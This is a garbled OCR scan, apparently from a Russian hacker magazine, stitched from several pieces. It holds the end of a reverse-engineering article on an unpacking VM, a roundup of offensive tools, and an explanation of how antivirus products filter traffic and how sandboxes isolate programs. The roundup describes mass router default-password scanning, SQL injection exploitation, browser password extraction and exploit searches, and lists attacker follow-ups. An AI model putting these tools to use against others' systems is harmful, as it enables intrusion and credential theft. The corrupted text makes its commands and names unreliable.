новывается САН ЕАХ, информация черпается 
по известным смещениям в таблице импор- 
та. В общей сумме в дампе набралось около 
десятка вызовов — смело выдираем и ставим 
нормальные вызовы ѴѴіпАРІ. Наиболее про- 
блемным является самый первый способ (по 
причине сумасшедшего количества вызовов — 
около 10к). Тут два варианта: 

1. Дампить. Простая техническая реализация, 
потребуется перетыкать все возможные 
меню, да и вообще пройти чуть ли не всю 
игру. В отличие от «Косынки» и «Пасьянса» 
— верный способ убить время с пользой! 

2. Зная структуру всех 255 островков (на 
самом деле в способе №1 участвуют около 
50), по сигнатуре базы запросов написать 
на С++ программу, которая ищет все базы 
запросов, затем строит всю цепь работы 
ѴМ и в нужном месте виртуального стека 
вытаскивает и дешифрует (ХОР ЗесгеЮАТА, 



43Е2АВ90) упрятанные данные. Наиболее 

эффективное решение. 

Особенностью способа №1 является пере- 
ход к ѴМ: САН АІ\ІѴ_0ЕЕ5ЕТ МР йѴѴОРО 
РТР 05:[перемещаемый адрес] -> база за- 
проса ^ МР [ѴМ_ѴІРТІІАЕ_А00РЕ55] ^ ѴМ. 

В остальных случаях все обходится прямым 
вызовом ѴМ без второго элемента в цепочке. 

Суть в том, что инструкция МР ОѴѴОРй 
РТР 05:[перемещаемый адрес] играет роль 
железнодорожной стрелки. Первый раз, когда 
вызывается внутренняя функция, «стрелка» пе- 
реведена на ѴМ, а точнее — в базу запросов, где 
происходитзаправка упомянутых выше двух ар- 
гументов для виртуальной машины (ЕРйѴѴОРО 
и ѴОЮ). В процессе работы ѴМ извлекает адрес 
запрашиваемой функции и ставит его как 
перемещаемый адрес — стрелка переведена! 
После выхода из ѴМ происходит переход в нашу 
запрашиваемую функцию, ну а после первого 
вызова все, кто будет ее вызывать, попадают 
сразу куда нужно. Как видишь, оптимизация! 
Кстати, количество инструкций, которые 
выполняются за один прогон виртуальной ма- 
шиной в способах №1 и №1А, колеблется около 
Зк, зато способ №2 бьет все рекорды — ЗОк. 
Причем островок без обфускации принадлежит 
именно последнему способу. Финишная работа 
с дампом включает перестроение в нормальный 
вид секции кода, удаление ненужных и посто- 
ронних внедрений типа 
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СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 





Автор: 

дагіпп 

цкі.: 

гіррег.2и8.ги 

Система: 

ѴѴіпсІоѵѵз 




ЛЕГКИЙ ПОИСК И РАСКРУТКА 
501- ИНЪЕКЦИЙ 




Автор: 

ТНе ЗХТеат 

цкі.: 

ЬіЦІу/Ы8кг5 

Система: 

ѴѴіпсІоѵѵз 




ВОССТАНАВЛИВАЕМ ПАРОЛИ 
ОТ БРАУЗЕРОВ 



ВѴЗсаппег (ВІаск Ѵіазіеііп Зсаппег) — это 
маленький, но крайне интересный скрипт 
на РегГе. Он позволяет сканить заданные 
диапазоны адресов на предмет наличия 
в них А05І_-роутеров. В процессе скана прога 
пробует войти в обнаруженные роутеры с по- 
мощью дефолтных логинов и паролей. Если 
вход удался, то все найденные учетные записи 
выводятся на экран и записываются в файл 
ассоипІз.М. 

Запуск скрипта крайне тривиален: 

регі Ьѵзсаппег.рі 
>Первый ІР-диапазон 
>Второй ІР-диапазон 

Кстати, так как сканер является много- 
поточным, за очень короткое время можно 
легко получить просто огромное количество 
аккаунтов. В результате успешного скана 
и получения доступа кучетке злоумышленник 
может сделать следующее: 

• изменитьпараметрыучетнойзаписи или 
настройки модема; 

• продолжить целевую атаку внутри сети; 

• создать РРТР-ѴРЫ на модеме, подключиться 
к нему и снифать трафик в открытом виде; 

• перепрошить модем, предварительно 
внедрив в образ разный ядовитый софт, — 
например, те же самые сниферы. 



Программа ЗСИРіррег — это продвинутый 
и удобный инструмент, предоставляющий 
мощные, гибкие и очень простые в исполь- 
зовании функции для поиска и анализа 
501-инъекций на основе БД Му50І_ и М550І_. 

Возможности программы: 

• поискотносительныхи абсолютныхссылок 
на страницах; 

• задание максимального количества найден- 
ных ссылок на странице; 

• проверка найденных ссылок на 50І_-ошибки; 

• определение количества полей в5Е1_ЕСТ- 
за просе с помощью операторов О РОЕВ ВУ, 
СРОІІР ВУ, ІЛМІОЫ 5ЕБЕСТ; 

• точное определение полей вывода; 

• возможностьзамены пробелов и коммента- 
риев на аналоги в случае наличия Ю5; 

• сохранение промежуточных результатов 
парсинга в файл .бЬЕ 

• чтение структуры базы данных и ее сохране- 
ние вХМБ-файл; 

• выгрузка произвольнойтаблицы и сохране- 
ниеее в .бЬЕ 

Хотя программа и обладает интуитивно- 
понятным интерфейсом, но тем не менее 
предлагаю тебе просмотреть обучающий ролик 
( ЬіЕІу/убНА2о ) с описанием основных ее фич, 
а также следить за всеми обновлениями на 
официальной странице утилиты. 



Представь такую ситуацию: внезапно ты забыл 
все свои (или не совсем свои :) пароли от веб- 
сервисов. Эти пароли ты предварительно на 
протяжении долгого времени сохранял в своем 
браузере. Каким же образом их добыть? Конеч- 
но, можно погуглить и найти множество раз- 
личныхутилит непонятного происхождения, 
но есть способ лучше! Представляю тебе за- 
мечательный софт под символичным названи- 
ем Вгоѵѵзег Раззѵѵогб Оесгуріог. Данная прога 
можетлегко и просто восстанавливать пароли 
из следующих браузеров: Рігеіох, Іпіегпеі 
Ехріогег, Соодіе СЬготе, боодіе СЬготе Сапагу, 
Орега Вгоѵѵзег, Арріе ЗаІ'агі, РІоск Вгоѵѵзег. 

Возможности и особенности софтины: 

• соттапб-Ііпе и 6111-интерфейсы в комплекте; 

• восстановление паролей любой длины 
и сложности; 

• автоматический поиск всех поддерживае- 
мых браузеров; 

• функционал сортировки и редактирования 
найденных паролей; 

• сохранение результатов в НТМЕ/ХМЕ/Техі; 

• программа представлена в РогІаЫе- 
варианте, что исключает необходимость ее 
установки. 

Пример использования утилиты из команд- 
ной строки: Вгом5егРа55могсЮесгур1:ог .ехе 
<ои1:ри1:_б1е ра1:1і>. 
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Автор: 

МезіЛ Тітиг 

цкі_: 

сосіе.доодіе. сот/р/ 
Лпсісіотаіпз 

Система: 

*піх/\л/іп 



ПОИСК СОСЕДЕЙ САЙТА ВМЕСТЕ С РШБОМАІМЗ 



РіпсЮотаіпз — это полезнейшая 
вещь для пентестеров. Данная прога 
представляет из себя многопоточный 
поисковый механизм, предназначен- 
ный для раскрытия доменных имен, 
сайтов и виртуальных хостов, кото- 
рые могут быть расположены как на 
одном, так и на соседних ІР-адресах 
(это расширит список потенциаль- 
но уязвимых меетжертвы). Так как 
РіпсЮотаіпз работает в консоли, ты 
легко сможешь встроить ее в свою 
пентестерскую автоматизированную 
систему. 

Утилита использует движок Віпд'а, 
поэтому для работы будет необхо- 



димо получить идентификатор Віпд 
йеѵеіорегз. Сделать это можно тут: 

ЬіпдесІ.іІ/6Асд5. а полученный Ю 
необходимо вставить в файл арріеі. 
М, находящийся в корне папки про- 
граммы. 

Некоторые особенности утилиты: 

• работаете первой 1000 результа- 
тов поиска Віпд; 

• помимо Бинга получаетдоменные 
имена с помощью 0145; 

• работаетвмногопоточномрежиме; 

• прекрасно работаете Мопо. 

Пользоваться утилитой очень просто: 
РіпсЮотаіпз .ехе ммл/.§оо§1е. сот 




Автор: 

Апіоп Кекз 

ЦКІ.: 

апдгуір.огд 

Система: 

*піх/ѵѵіп/тас 






Автор: 

зЗтуОп 

ЦРІ.: 

Ьі1.Іу/ѵѵ87ѴиА 

Система: 

*піх/ѵѵіп 




АЫбРѴ ІР 5САМЫЕР — СЕТИ ПОД 
КОНТРОЛЕМ 

Если твоя повседневная работа связана 
с сетями и их безопасностью, то наверняка 
ты должен знать о такой культовой програм- 
ме как Апдгу ІР Бсаппег (или просто ірзсап). 
Данный кроссплатформенный и опенсорс- 
ный сканер прежде всего предназначен для 
сканирования диапазонов ІР-адресов в сети 
и соответствующих им открытых портов. 

Прога просто пингует каждый айпишник 
на проверку его жизнеспособности, затем 
опционально получает имя хоста, МАС-адрес, 
список открытых портов и так далее. 

Кстати, с помощью плагинов (которые ты сам 
можешь написать на )аѵа) вполне реально не- 
хило расширить список получаемых данных. 
Также в сканере присутствует целый ряд 
приятных фич вроде получения N еіВ 1 05- 
информации (имя компьютера, рабочая группа 
и имя текущего ѴѴіпсІоѵѵз-юзера), определения 
веб-сервера, сохранения результатов скани- 
рования в С5Ѵ-, ТХТ- и ХМІ_- форматы. 

Чтобы начать процесс скана, необходимо 
просто вбить желаемый диапазон адресов 
(например, от 192.168.0.1 до 192.168.0.255] 
в соответствующие окна или применить 
опцию их случайной генерации, а затем на- 
жать на кнопку старта. В результате начнется 
многопоточный процесс скана, результаты 
которого ты сможешь наблюдать прямо у себя 
на экране. 



ИЩЕМ АНОМАЛИИ В РЕ-ФАЙЛАХ 



Для усложнения задачи реверсера различные 
пакеры и протекторы модифицируют заголов- 
ки РЕ-файлов. Иногда аномалии в заголовках 
могут уронить различные дебаггинг-тулзы 
и другие 6111-анализаторы, затруднив таким 
образом процесс изучения исполняемого фай- 
ла. В таких случаях тебе поможет Ехебсап — 
скрипт на РуіЬоп'е, специально предназначен- 
ный для выявления таких аномалий. Утилита 
быстро сканирует выбранный исполняемый 
файл и обнаруживает все виды возможных 
аномалий в его заголовках. Обнаружение 
происходит с помощью подсчета контрольной 
суммы, размера различных полей в заголовке, 
размера сырых данных, выявления имен поп- 
азсіі/пустых секций и так далее. 

Функционал скрипта: 

• автоматизация поиска аномалий в РЕ; 

• определение сигнатур компиляторов и па- 
керов; 

• сканирование АРІ для известной мал вари; 

• отображениезаголовка РЕитаблицы им- 
порта; 

• нативная поддержка генерации различных 
отчетов. 

Для использования сканера тебе необхо- 
дима питоновская библиотека РЕРіІе от Эро 
Карреры. Найти ее ты также сможешь на на- 
шем диске. Пример запуска сканера: ехезсап. 
ру -а <раіб іо ехе біе. 



ЮЗАЕМ БАЗУ ЕХРЮ1Т-0В.С0М 
ИЗ КОМАНДНОЙ СТРОКИ 

Если ты являешься заядлым консольщиком, 
то наверняка каждый раз в поисках экс- 
плойтов тебе было лениво открывать браузер 
и залазить на ехрІоіі-сІЬ.сот . С появлением 
утилиты деізріоііз (кстати, написана она на 
Питоне) необходимость в этом отпала! Данная 
тулза может искать определенные сплойты/ 
шелл-коды/описания сплойтов с помощью 
нескольких поисковых опций, а затем выво- 
дить описания и линки для всего найденного 
стаффа. 

Основные опции утилиты: 

• о: вывод результатов в файл; 

• ц: «тихий» режим работы; 

• б: показатьэкран помощи. 

Опции поиска: 

--аиібог: — а втор эксплойта; 

--рІаЧюгт: — платформа (выбор из47 пунктов); 
--Іуре:тип сплойта 

--озѵсі Ь: 05\Ю В- идентификатор сплойта; 

--сѵе: СѴЕ-идентификаторсплойта. 

Примеры поиска различныхэксплойтов: 

^еізріоііз . ру -о 1іпих_збе11сосІе.1:х1: 
--іуре збеіісосіе 

^еізрІоііБ.рѵ -о -РгееЬзсІ х86-64 Іосаі. 
іхі --ріаібогт 10 

^еізріоііз . ру --аиібог тахе ѵЬиІІеііп 
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МАІ_ѴѴАКЕ 



Евгений Дроботун (сІгоЬоІипйхакер.ги) 




Что у нас осталось? Дай- 
ка вспомнить. А, вот что: 
контроль сетевого трафика 
и противодействие сігіѵе-Ьу 
загрузкам, а также способы 
запуска подозрительных 
приложений в изолированной 
и контролируемой среде 
(именно так правильно 
раскрывается понятие 
«песочница»). Разберем все 
это прямо сейчас! 



МОНИТОРИНГ СЕТЕВОЙ 
АКТИВНОСТИ И ПЕСОЧНИЦЫ 
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Сантивирусами покончено! 




о мнению операционной системы от 
Майкрософт, файлы из интернета 
могут быть полезны. А еще они могут 
быть вредны. И для того, чтобы отделить 
первый тип файлов от второго, рядовой юзер 
использует антивирус. А как современные 
антивирусные средства определяют «бла- 
гонадежность» того, что идет из сети? Как 
различные системы защиты могут проконтро- 
лировать и остановить трафик, порождаемый 
вредоносными программами? 

Чтобы ответить на эти вопросы, для на- 
чала необходимо определиться с некоторыми 
основными вещами. Прежде всего, понять, чем 
является компонент антивирусной защиты, от- 
ветственный за безопасность взаимодействия 
с сетью. Это не что иное, как фильтр, который 
находится между приложениями и сетевыми 
компонентами операционной системы, решая, 
что можно, а что нельзя. Для этого он произво- 
дит внедрение указанного фильтра в ключевые 
места взаимодействия приложений и сети, осу- 
ществляя анализ всего трафика на предмет со- 
ответствия определенному набору правил. Все, 



что удовлетворяет заданным условиям, про- 
пускается, остальное — блокируется (с экран- 
ным предупреждением или без него, с записью 
в журнал событий или без — в зависимости от 
настроек компонента сетевой защиты). 

И опять мы вышли на ту самую — нашу 
любимую :) — двухкомпонентную схему анти- 
вирусной защиты из самой первой статьи. Есть 
нечто, что «сидит» на всех возможных путях 
сетевого трафика в компьютере и перехваты- 
вает этоттрафик, а есть нечто, что анализирует 
этот трафик и принимает решение о дальней- 
ших действиях. Эти два «нечто» и являются 
технической и аналитической составляющими 
компонента антивирусной защиты, ответ- 
ственного за сетевую безопасность. 

Аналитическая составляющая в своих 
действиях опирается на сигнатуры и эвристи- 
ческий поиск: шаблоны, правила, весовые ко- 
эффициенты — все то, что мы уже «проходили» 
ранее. А вот о том, что касается технической 
составляющей, — той самой, которая должна 
перехватывать трафик на всех возможных 
путях, — мы поговорим более подробно. 



КОНТРОЛ ЫРАФИКА НА НИЗКОМ 
УРОВНЕ 



Упрощенно модель сетевой подсистемы 
ѴѴіпсІоѵѵз можно представить в виде не- 
скольких уровней. На самом верхнем уровне 
находится библиотека ѵѵз_32.сІІІ, в которой 
реализованы функции ѴѴіпзоск (зепсі, гесѵ, 
соппесі и так далее). Большинство приложе- 
ний взаимодействуете внешним миром (то 
есть с Сетью) именно через эту библиотеку, 
перехватив вызовы функций которой, можно 
легко посмотреть все, что эти приложения 
отправляют в Сеть или принимают из нее. 
Когда-то давно некоторые брандмауэры 
и другие системы защиттак и поступали, но 
в настоящее время так уже никто не делает, 
поскольку, во-первых, зловредные приложе- 
ния могут работать в обход \л/з_32.сІІІ, вызывая 
функции более низких уровней, а во вторых, 
большая часть сетевого трафика также может 
проходить на более низком уровне. 

Ниже ѵѵз_32.сІІІ находится драйвер а^сі.зуз 
(АпсіІІагу Рипсііоп Бгіѵег Іюг ѴѴіпБоск — вспо- 
могательный служебный драйвер), в котором 
как раз и реализованы все функции работы 
с сокетами (создание сокетов, установка 
соединения и так далее). Можно сказать, что 
ѵѵз_32.сІІІ представляет собой высокоуров- 
невую обертку над а^сі.зуз. Если быть точнее, 
то между а^сі.зуз и ѵѵз_32.сІІІ находится еще 
и тзаі'сі.сііі в качестве так называемой про- 
межуточной обертки. Некоторые брандмауэры 
«садятся» на эту библиотеку с целью филь- 
трации трафика, но эффективность такого 
решения оставляет желать лучшего, поскольку 
вредоносы могут запросто обратиться напря- 
мую к а^сі.зуз, а то и вообще мимо всех сокетов. 

Опустившись еще ниже, можно увидеть 
драйвер Ісрір.зуз, в котором реализован 
протокол Іср/ір. Это так называемый уровень 
транспортного (или сетевого) протокола ЮІ 
(Тгапзрогі Баіа Іпіегі'асе — интерфейс пере- 
дачи данных). Здесьтакже можно найти, 
например, пѵѵіпкірх.зуз, реализующий про- 
токол ірх. Для фильтрации трафика на этом 
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Перехваты ІоСгеаІейеѵісе в «Касперском» и йгѴѴеЬ, перехват ТсііКедізіегОеѵі- 
сеОЬіесІ из Ыі.зуз в «Касперском» шестой и седьмой версий 



Часть содержимого іпі-файла драйвера фильтра кіітб.зуз из состава «Антивируса 
Касперского» 
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Перехват ШЗ-функций антивирусом от компании Сотого (вверху) и в ОиІРозІ РігеѴѴаІІ Рго 7.0 (внизу) 



уровне необходимо перехватывать все вызовы 
к устройствам \Оеѵісе\РаѵѵІр, \йеѵісе\11бр и \ 
йеѵісеМср (в случае работы по ІРѵб — \йеѵісе\ 
Паѵѵірб, \0еѵісе\ІІсІр6, \0еѵісе\Тср6 соот- 
ветственно). Это достигается либо вызовом 
ІоАиасЬОеѵісе, либо прямой модификацией 
указателей таблицы диспетчеризации, либо 
перехватом ІоСгеаІейеѵісе до инициализа- 
ции этих устройств, чтобы в дальнейшем 
полностью их контролировать. Некоторые из 
антивирусов именно так и поступают. Напри- 
мер, ранний «Касперский» перехватывал эту 
функцию путем модификации таблиц импорта 
в нужных драйверах, так же делает йг.ѴѴеЬ, 
изменяя таблицу импорта в драйвере Ісрір. 
вуз. Для этих же целей «Касперский» шестой 
и седьмой версий перехватывал функцию 
ТсІіРедІ5Іег0еѵісе0Ь)есІ из Ісіі.зуз, модифици- 
руя таблицу экспорта этого драйвера. 

Далее, еще ниже, находится драйвер под 
названием N015 (Ыеіѵѵогк йгіѵег Іпіегі'асе 
ВресіПсаІіоп — спецификация интерфейса 
сетевых драйверов). Ниже него — только 



Модули ВНО от «Антивируса Касперского» в Іпіегпеі Ехріогег 



драйвер сетевой карты, поэтому антивирус или 
брандмауэр, «сидящий» на Ы0І5-уровне, пере- 
хватывает практически весь трафик, который 
только проходит через компьютер. 

Сегодня подавляющее большинство пра- 
вильных антивирусов контролируют трафик 
именно на этом уровне. Существует по мень- 
шей мере три более или менее документиро- 
ванных и легальных способа проделать это. 
Первый способ (самый легальный из всех и ре- 
комендованный МісгозоК к использованию) — 
это так называемый N015 Іпіегтесііаіе йгіѵег 
(промежуточный драйвер N015). Второй способ 
(его еще иногда называют «псевдопромежу- 
точный драйвер») есть не что иное, как пере- 
хват некоторых функций из псііз.зуз. Третий 
способ — РіІІег Ноок Огіѵег (драйвер фильтра 
ловушки) представляет собой обычный кегпеі- 
тобе драйвер, который фильтрует сетевые 
пакеты на уровне ІР. МісгозоЙ категорически 
не рекомендует использовать этот способ 
в средствах контроля трафика и антивирусной 
защиты. Этот драйвер ставится слишком вы- 



соко, да и такой фильтр-ловушка может быть 
установлен в системе всего лишь один. 

В этом вопросе все известные антивирусы 
проявляют единодушие — чтут рекоменда- 
ции компании-производителя операционных 
систем и третий способ в своих продуктах 
не применяют (хотя, говорят, встречаются 
производители, которые эти рекомендации 
игнорируют, но мне что-то такие антивирусы 
и брандмауэры не попадались). 

Что касается оставшихся первых двух 
способов, то подавляющее большинство 
применяют либо только первый, либо первый 
в сочетании со вторым, и лишь некоторые до- 
вольствуются только вторым. 

Промежуточные N^I5-драйверы в антиви- 
русных программах могут быть двух видов: не- 
посредственно промежуточный драйвер — как 
правило, в ѴѴіпбоѵѵз ХР, так как других там и не 
предусмотрено (N015 версии 5), и драйвер- 
фильтр — эта разновидность промежуточных 
N^I5-драйверов появилась начиная с ѴѴіпбоѵѵз 
Ѵізіа ^0І5версии 6). 

Остановимся на различиях промежуточных 
драйверов и драйверов-фильтров. Итак, когда 
трафик движется в сеть, то есть от протокола 
к сетевой карте, он проходит через очередь 
пользовательских драйверов, которую сфор- 
мировал N015. Внутри этой очереди распола- 
гаются промежуточные драйверы, которые 
выстраиваются в очередь по неизвестному 
алгоритму, однако спецификация гарантирует, 
что трафик пройдет через каждый драйвер 
в этой очереди. Промежуточный драйвер пред- 
ставляет собой обманку: «сверху», то есть для 
драйверов, которые располагаются над ним, 
он выглядит как минипорт (хотя настоящие 
минипорты еще далеко внизу), а «снизу» — как 
протокол (хотя протоколы далеко вверху). 

В свою очередь драй вер- фильтр — это 
драйвер, который располагается также на 
пути следования трафика от сетевой карты до 
протоколов, однако конкретное его местополо- 
жение в очереди определяется настройками, 
содержащимися в Ы-файле этого драйвера- 
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Сантивирусами покончено! 



ПЕРЕХВАТИВ ЭТИ ФУНКЦИИ, МЫ 
СМОЖЕМ КОНТРОЛИРОВАТЬ ПРОЦЕСС 
ИНИЦИАЛИЗАЦИИ ВСЕХ СЕТЕВЫХ 
СОЕДИНЕНИЙ, А В ИТОГЕ — ВЕСЬ ТРАФИК 



фильтра. Помимо месторасположения 
драйвера-фильтра в іпі'-фа йл е указывается 
еще и тип этого драйвера: драйвер-монитор, 
дающий возможность только просматривать 
трафик, или драйвер-модификатор, допускаю- 
щий еще и модификацию трафика. Думаю, 
понятно, что второй тип в антивирусах исполь- 
зуется гораздо чаще, чем первый. 

Другая возможность контролировать 
трафик на Ы0І5-уровне — это, как мы уже 
говорили, перехват некоторых функций 
из Ы0І5-драйвера. Из всего многообразия 
функций, экспортируемых этим драйвером, 
наиболее подходящими для данных целей 
будут ІМсІізОрепАсІарІег и ІМсІізРедізІегРгоІосоІ. 
Перехватив эти функции, мы сможем контро- 
лировать процесс инициализации всех сетевых 
соединений, а в итоге — весь трафик, про- 
ходящий через эти соединения. Так поступает, 
например, антивирус от компании Сотосіо, 
который помимо установки промежуточного 
ЫйІЕ-драйвера еще и перехватывает функ- 
ции ІМсІізОрепАсІарІег, ІМсІізРедізІегРгоІосоІ, 
ШізСІозеАсІарІег и ІМсІізОегедізІегРгоІосоІ. 
Некоторые системы защиты интернет- 
трафика довольствуются перехватом только 
ІМсІізОрепАсІарІег, который позволяет отследить 
установку и инициализацию сетевых адапте- 
ров в системе. Самое главное при использова- 
нии такого рода перехватов функций — успеть 
перехватить их раньше, чем произойдет иници- 
ализация какого-нибудь сетевого соединения, 
иначе контролировать его уже не получится. 



КОНТРОЛЬ ЗА ТРАФИКОМ 
В БРАУЗЕРАХ 



Конечно, перехватив весьтрафик на N015- 
уровне, можно было бы на этом и успокоиться. 
Но все же контроль за содержимым адресной 
строки браузера, веб-страниц и )аѵа-скриптов 
(а ответственность за распространение 
вредоносных программ посредством бгіѵе-Ьу 
загрузок в большинстве случаев лежит именно 



на них] гораздо целесообразнее и проще осу- 
ществлять непосредственно в самом браузере. 
Для этого многими антивирусными продук- 
тами используется возможность наращивать 
функциональность браузеров посредством 
расширений. Чаще всего используются ВНО 
(Вгоѵѵзег Неірег 0Ь)ес1 — модуль поддержки 
браузера). Модули ВНО реализуются в виде 
сІІІ-библиотек, которые дополняют Іпіегпеі 
Ехріогег. Как правило, объекты ВНО не имеют 
собственного пользовательского интерфейса 
и существуют в виде простой библиотеки, ко- 
торую браузер подгружает при старте. Спектр 
возможного применения ВНО огромен — от мо- 
дуля, который отслеживает вводимые в адрес- 
ную строку данные, до подмены содержимого 
веб-страниц и перенаправления запросов. 

Что может сделать с содержимым, к при- 
меру, адресной строки антивирус, перехва- 
тивший посредством ВНО данные из Іпіегпеі 
Ехріогег'а? Во-первых, прогнать этот адрес по 
своей базе вредоносных ссылок и заблоки- 
ровать вывод страницы в случае наличия за- 
прашиваемой ссылки в этой базе. Во-вторых, 
можно обратиться к различным облачным ре- 
сурсам (собственным или посторонним) и, в за- 
висимости от наличия этой ссылки в их базах 
или на основе различных рейтинговых оценок, 
предупредить пользователя о потенциальной 
вредоносности посещаемой страницы. 

Непосредственно в самом содержимом 
веб-страницы тоже могут таиться нехорошие 



ссылки, которые, равно как и содержимое 
адресной строки, необходимо отслеживать 
и контролировать. Помимо вредоносных 
ссылок, в содержимом веб-страниц могут быть 
вредоносные ^ѵа-скрипты, для распознава- 
ния которых на помощь опять-таки приходят 
антивирусные базы с сигнатурами. 

В общем, имея хорошую и регулярно попол- 
няемую базу сигнатур вредоносных скриптов 
и ссылок на вредоносные сайты, можно до- 
статочно успешно отсеивать почти всю заразу, 
которая может встретиться в сети. Почти 
всю — потому что какой-нибудь свеженький 
скрипт, которого нет в базе, будет наверняка 
пропущен и сделает свое черное дело. Более 
того, даже самый старый скрипт, который есть 
во всех антивирусных базах, можно запросто 
зашифровать или обсфусцировать по-новому, 
— и вот он уже и не такой старый, и запросто 
может пройти мимо всех препон, выстав- 
ленных антивирусными сканерами сетевого 
трафика. 

Поэтому на помощь приходят эвристика 
и динамический анализ кода (то есть его ана- 
лиз во время исполнения). К примеру, при ана- 
лизе ЫтІ-кода антивирусы смотрят на параме- 
тры, используемые тегом іітате (напомню, 
этот тег в тексте страницы часто используется 
для невидимой и неконтролируемой загрузки 
вредоносных объектов). Если эти параметры 
кажутся ему подозрительными (типа высота 
и ширина равны нулю или очень маленькие), 




Текст .Лаѵа-скрипта в перехваченном ННр-трафике 




Обфусцированный вредоносный .Лаѵа-скрипт под названием Тгоіап-ОоѵѵпІоасІегЩБ.АдепІ. 
дНсі (понять, что он делает, довольно затруднительно) 
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Про N015 можно 
почитать на ѵіікі.пеі/ 
ги/зіогу/ѵѵесіепіе-ѵ- 
псіІ5 (на русском) или 

на тзсІп.тісгоБоН. 
сот/еп-иа/ІіЬгагу/ 
«564881 (по- 
английски) 



ГИ1 

Содержание двух 
предыдущих статей 
цикла ищи нашем 
диске. 



Замена стандартного обработчика ^ѵа-скриптов на собственный, 
выполненная «Антивирусом Касперского» 



Перехват некоторых функций из пМІІ.ШІ, выполненный песочницей БапсіЬохІЕ 
(подложные функции находятся в библиотеке БЬіеОН.сІІІ) 



то это повод навострить уши. Тем более, что 
іітате используется все реже и реже. 

Что касается зашифрованных, обфусци- 
рованных или еще незнакомых антивирусу 
вредоносных скриптов, то выходом является 
эмуляция их исполнения с последующим 
анализом по сигнатурам или с помощью эври- 
стики. 

Для выполнения Эаѵа-скриптов исполь- 
зуется движок, который представляет собой 
0І_І_- модуль івсгірі.сііі. Он находится обычно 
в папке %ѵѵіпсІіг%\5у5Іет32, содержит реали- 
зацию набора СОМ-интерфейсов и использует- 
ся ІЕ для выполнения 35. В ѴѴіпсІоѵѵз опреде- 
лено три 61ІЮ (уникальных идентификаторов) 
СОМ-объекта — движка интерпретатора 
скриптов ЭзсгірЕ Это {1 : 414с260-6ас0-11с1 : - 
Ьбс1 1 -00аа00ЬЬЬЬ58}, {М14с261-6ас0-11с*- 
Ь6б1-00аа00ЬЬЬЬ58} и Й414с262-6ас0~Ш- 
ЬбсІІ -00аа00ЬЬЬЬ58}.Есл и поискать в реестре 
эту строку, то можно увидеть, какой модуль 
зарегистрирован в качестве интерпретатора 
ЭаѵаБсгірЕ Как уже было упомянуто, обычно 
это ізсгірі.сііі. Но ничего не мешает антивирусу 
подменить эту ветку реестра и зарегистри- 
ровать в системе свой обработчик скриптов, 
который и будет выполнять анализ их вредо- 
носности и «пущать или не пущать». 

Недостаток такой подмены в том, что 
анализируются только скрипты, выполняе- 
мые в браузерах, использующих стандартный 
ЭаѵаЗсгірІ-движок ѴѴіпсІоѵѵз. 



КАК РАБОТАЕТ ПЕСОЧНИЦА 



Почему-то происхождение названия «песоч- 
ница» для изолированной среды исполнения 



программ с контролируемыми параметра- 
ми многие объясняют аналогией с детской 
песочницей. Что ж, такая версия тоже имеет 
право на существование, но лично мне ближе 
другая. У пожарных «песочницей» называется 
специальный бак с песком, в котором можно 
безопасно экспериментировать с легковоспла- 
меняющимися веществами. 

В антивирусных песочницах можно выде- 
литьтри базовые модели изоляции простран- 
ства от всей остальной системы. 

Изоляция на основе полной виртуализации 

Заключается в использовании движка 
виртуальной машины в качестве защитного 
слоя над гостевой операционной системой. 
Такой подход дает очень высокий уровень 
защиты основной рабочей системы. Недо- 
статки очевидны — большой объем, большое 
потребление ресурсов системы и сложность 
обмена данными между основной системой 
и песочницей. 

Изоляция на основе частичной виртуализа- 
ции файловой системы и реестра 

Совсем не обязательно использовать движок 
виртуальной машины для изоляции выполне- 
ния программ. Можно просто подставлять про- 
цессам, запущенным в песочнице, не реальные 
объекты файловой системы и реестра, а их 
дубликаты. Попытка их изменения приведет 
к изменению лишь их копий внутри песочницы, 
реальные данные не изменятся и не пострада- 
ют. Основной недостаток такого вида песочниц 
— пробои или обход, и в результате — выход 
вредоносного кода в основную систему. Не- 



смотря на это, данный подход является основ- 
ным в большинстве продуктов (БапсіЬохІЕ, 
ВіШег2опе, изолированные среды антивирусов 
Казрегзку Іпіегпеі Зесигііу, Сотосіо Іпіегпеі 
Зесигііу Рго, Аѵазі Іпіегпеі Зесигііу). 

Изоляция на основе правил 

Все попытки изменения объектов файловой 
системы или реестра не виртуализируются, 
а рассматриваются сточки зрения набора вну- 
тренних правил средства защиты. Недостаток 
такого подхода тот же, что и во втором случае 
— возможность выхода зловредного при- 
ложения из-под контроля песочницы. Однако 
в этом случае гораздо проще осуществлять 
обмен данными между контролируемой средой 
и основной системой. Пример — ѴѴіпсІоѵѵз ІІзег 
Ассоипі Сопігоі (хорошо всем известный и мно- 
гим надоедающий контроль учетных записей 
ѴѴіпсІоѵѵз]. 

В связи с тем, что наиболее широкое при- 
менение получил второй подход, стоит его 
рассмотреть подробнее на примере широко 
распространенной песочницы БапсіЬохІЕ. Фай- 
ловая система виртуализируется достаточно 
просто — путем создания дубликатов папки 
текущего пользователя, дубликатов журна- 
лов транзакций общей файловой системы 
и папок, имитирующих накопители (внутрен- 
ние и внешние). Также создается дубликат 
реестра. 

После того как созданы дубликаты фай- 
ловой системы и реестра, задача песочницы 
сводится к перехвату всех функций работы 
с файлами и реестром. Если приложение, 
обращающееся к реестру или пытающееся 
создать/изменить какой-либо файл, запущено 
не из-под песочницы, то управление пере- 
дается оригинальным функциям. Если же 
такое приложение выполняется в песочнице, 
то вместо настоящего реестра и настояще- 
го внешнего накопителя ему посредством 
перехваченных функций подсовываются их 
дубликаты. 

Поскольку функций, с помощью которых 
можно работать с файловой системой и рее- 
стром, много, то и перехватов приходится де- 



В АНТИВИРУСНЫХ ПЕСОЧНИЦАХ МОЖНО 
ВЫДЕЛИТЬ ТРИ БАЗОВЫЕ МОДЕЛИ 
ИЗОЛЯЦИИ ПРОСТРАНСТВА ОТ ВСЕЙ 
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лать много. К примеру, БапсіЬохІЕ производит 
перехват 56 функций из пІсІІІ.сІІІ, 68 функций из 
изег32.сІІІ, 71 функции из асІѵарі32.сІІІ, 6 функ- 
ций из кегпеІ32.сІІІ и 1 функции из ѵѵ5_32.сііі. 

Теперь пара слов про методы принятия 
решения о помещении выполняемого приложе- 
ния в песочницу, а также о режимах ее работы. 
Методов принятия решения по большому счету 
два. 

На основе правил 

Модуль принятия решения обращается к вну- 
тренней базе правил запуска приложений и в 
зависимости от них запускает приложения либо 
в песочнице, либо в основной системе. Такой 
подход применяют БапсіЬохІЕ, ВиіТег2опе. 

На основе эвристических подходов 

